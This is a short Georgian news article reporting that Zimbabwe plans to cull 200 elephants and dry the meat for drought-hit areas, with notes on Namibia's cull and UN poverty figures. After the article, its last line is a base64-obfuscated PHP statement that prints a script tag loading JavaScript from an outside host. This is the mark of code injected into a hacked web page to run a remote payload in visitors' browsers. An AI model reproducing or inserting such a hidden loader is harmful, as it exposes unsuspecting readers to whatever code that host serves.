celsiusi
ავერსი შნაიდერი

 გვალვით გამოწვეული საკვების ნაკლებობის გამო ზიმბაბვეში 200 სპილოს მოკვლას აპირებენ. „გარდიანის“ ცნობით, ხელისუფლებამ უკვე გასცა შესაბამისი განკარგულება.

როგორც ბრიტანული გამოცემა წერს, სპილოებზე ნადირობა დაგეგმილია, მათ შორის, ქვეყნის უდიდეს ნაკრძალში – ჰვანგეში. შემდეგ ზიმბაბვეს ხელისუფლება გეგმავს „ქალების მობილიზებას, რათა გააშრონ სპილოს ხორცი და გააგზავნონ იმ რაიონებში, სადაც საკვების მწვავე დეფიციტია“. ზიმბაბვეში ამჟამად დაახლოებით ასი ათასი სპილო ბინადრობს, ხელისუფლებაში ამბობენ, რომ ეს საკმარისზე მეტია.

ცნობისთვის, ველური ცხოველების დახოცვის გადაწყვეტილება ნამიბიის ხელისუფლებამაც მიიღო. იქ ცხოველების განადგურება უკვე დაიწყეს. ზიმბაბვემ და ნამიბიამ, სამხრეთ აფრიკის კიდევ რამდენიმე ქვეყანასთან ერთად, საგანგებო მდგომარეობა გამოაცხადეს გვალვის გამო.

გაერო-ს შეფასებით, ზიმბაბველების დაახლოებით 42% სიღარიბეში ცხოვრობს. ქვეყნის ხელისუფლება თვლის, რომ ექვს მილიონ ადამიანს, ანუ მოსახლეობის ერთ მესამედზე მეტს, ნოემბრიდან მარტამდე პერიოდში სურსათით დახმარება ესაჭიროება.

114
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");